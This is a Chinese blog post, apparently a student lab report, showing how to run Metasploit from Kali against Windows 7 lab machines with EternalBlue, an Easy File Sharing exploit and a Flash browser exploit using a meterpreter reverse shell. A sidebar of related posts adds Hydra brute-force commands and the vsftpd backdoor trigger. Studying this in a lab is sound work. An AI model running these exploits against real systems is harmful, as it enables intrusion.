kali使用Metasploit进行渗透攻击实验

已于 2024-06-13 22:59:43 修改
阅读量693 收藏 16
点赞数 7
文章标签: 网络 安全 web安全
于 2024-06-13 22:39:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ysm_zxc/article/details/139665302
版权

Metasploit

Metasploit是一款开源的安全漏洞检测工具

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。

Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。

Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。


一、Metasploit的基础

1.启动 

在kali命令窗口打出msfconsole命令即可启动Metasploit


Metasploit v6.3.4-dev表示版本

2294 exploits表示漏洞渗透模块数量
1201 auxiliary表示辅助模块数量
409 post表示后渗透攻击模块数量
968 payloads表示攻击荷载模块数量
45 encoders表示编码工具模块数量
11 nops表示空指令模块数量

2. Metasploit的常用命令

(1)show 显示

(2)search 搜索

(3)use 使用

(4)set 设置

(5)back 退回

(6)help 帮助

(7)run 启动

(8)exit 退出

3、Metasploit的常用模块

(1)exploit(漏洞渗透模块)

(2)payload(攻击载荷模块)

(3)auxiliary(辅助模块)

(4)post(后渗透攻击模块)

4、命令几个种类

(1)核心命令core command

(2)模块命令module command

(3)任务命令job command

(4)资源命令resource script command

(5)数据库后台命令database backed command

(6)登录凭证后台命令credentials backed command

二、使用Metasploit对操作系统发起攻击 

实验环境:

Kali 2主机IP:192.168.152.128
靶机(64位windows 7,永恒之蓝靶机)IP:192.168.152.129 

1、使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。

 (1)启动metasploit         

        msfconsole
(2)搜索smb_ms17_010检测脚本

        search smb_ms17_010
(3) 对目标主机进行扫描   

        set rhost 192.168.152.129

        run

反馈的结果是靶机上有ms17_010漏洞

2、搜索ms17_010_eternalblue渗透模块,设置需要的参数,启动模块。


3、控制目标主机,查看靶机根目录

        shell

        dir

 三、使用Metasploit对软件发起攻击

实验环境:

Kali 2主机:192.168.152.128
靶机(32位Windows 7,安装了Easy File Sharing HTTP Server)IP:192.168.152.129  

1、查找与EasyFileSharing有关的渗透模块,载入easyfilesharing_seh渗透模块

(1)启动Metarsploit
(2)查找与EasyFileSharing有关的渗透模块
        search EasyFileSharing

2、在目标靶机启动Easy File Sharing

3、设置需要的参数,启动模块

4、到kali中查看,会话成功建立了

四、使用Metasploit对客户端发起攻击

前面介绍的两种攻击都是主动攻击方式,除此以外,metasploit中还提供了大量的被动攻击方式。被动攻击方式需要得到受害者的配合才能成功,但是在日常生活中,这种攻击方式的成功率往往比主动攻击要高。

被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。

实验环境:

Kali 2主机IP:192.168.152.128

靶机(32位Windows 7,安装了Adobe Flash Player插件):192.168.152.129

1、查找与Adobe Flash Player有关的渗透模块

(1)启动Metarsploit

(2)查找与Adobe Flash Player有关的渗透模块

        search Adobe Flash Player

2、载入exploit/multi/browser/adobe_flash_hacking_team_uaf渗透模块,查看需要设置的参数并进行设置,启动模块。

(1)载入渗透模块

        use exploit/multi/browser/adobe_flash_hacking_team_uaf

(2)查看需要设置的参数,启动模块

        show options    

        set payload windows/meterpreter/reverse_tcp

        set lhost 192.168.152.129

        run

2022级计算机网络一班何宏超
关注
  • 7
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4210
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
利用kali机对metaploitable做渗透攻击
KT986的博客
06-19 1903
仅作学习参考使用 一、虚拟机&&靶机的准备 1)kali linux的安装 https://www.kali.org/get-kali/#kali-virtual-machines 2)Vmware虚拟机的安装 3)靶机metaploitable2的安装 下载地址:https://sourceforge.net.projects/metasploitable/ (如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发本人已经调试好的
kali渗透metasploitable靶机
热门推荐
浮生若梦的专栏
11-16 2万+
扫描阶段: 工具:Nmap 隐蔽扫描      nmap  -sS 192.168.8.135 端口爆破:FTP、SSH等 工具:Hydra 备用字典 爆破FTP hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135 爆破SSH
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
VN520的博客
12-20 1627
Metasploit framework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3897
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
kali linux渗透攻击基于漏洞工具Metasploit
xiaoma920的博客
05-25 805
该文章只提供学习,禁止做违法的事情,任何后果与作者无关2.第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
使用Metasploit实现渗透攻击
2201_76043604的博客
06-24 1163
网络渗透攻击是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一, 危害性也非常严重。例如 ,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器, 继续入侵目标网络,获取整个网络中所有主机的权限。二、Metasploit本次实验主要讲解了(1)Metasploit的基础使用和方法基本命令。
网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
web18484626332的博客
03-07 2351
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 这篇文章教大家了解Metasploit基本使用方法 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透
Kali Linux 渗透攻击测试
最新发布
jcs233的博客
04-18 1546
一月末,Adobe发布了Flash Player的APSA15-01安全公告,此公告修复了一个可影响FlashPlayer 16.0.0.287及之前版本的重要UAF漏洞(被确认为CVE-2015-0311)。地址:http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/作者:Francisco Falcón。实验环境:填写如下IP地址。
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击
第7章渗透攻击 使用Metasploit对操作系统发起攻击
qq_69351815的博客
06-10 546
渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。
kali linux攻击机及windowsXp/Metasploit_linux靶机安装及在此基础上的蜜罐系统搭建(上)
微光·火炬
06-20 7190
一、创建虚拟机Linux攻击机步骤: 1.下载安装好Vmware 2.创建新虚拟机——Linux攻击机       (1)点击 “ 创建新虚拟机”,出现如下视图,选择“稍后安装操作系统”,下一步 (2)选择Linux操作系统,版本选为“其他Linux3x内核64位”,下一步——>位置自选,下一步       (3)选择磁盘容量,尽量大一点
Metasploitable2靶机渗透
D-R0s1的博客
04-13 9237
Metasploitable2介绍    Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击网络中...
kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞
边城浪子的博客
07-27 1249
漏洞:vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 靶机:Metasploitable2 step1:开启kali linux 和 Metasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...
渗透测试-Metasploitable2靶机
道阻且长,行则将至。
02-22 7970
靶机介绍 Metasploit框架 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示,Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是一个特别制作...
Metasploit渗透实践:Kali Linux与Windows XP模拟攻击
"这篇文档是关于使用Kali Linux和Metasploit进行渗透测试的实践教程。它引导读者通过一系列步骤,从安装虚拟机环境到利用Metasploit进行网络扫描和渗透Kali Linux是一个专为渗透测试设计的操作系统,包含了众多预...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值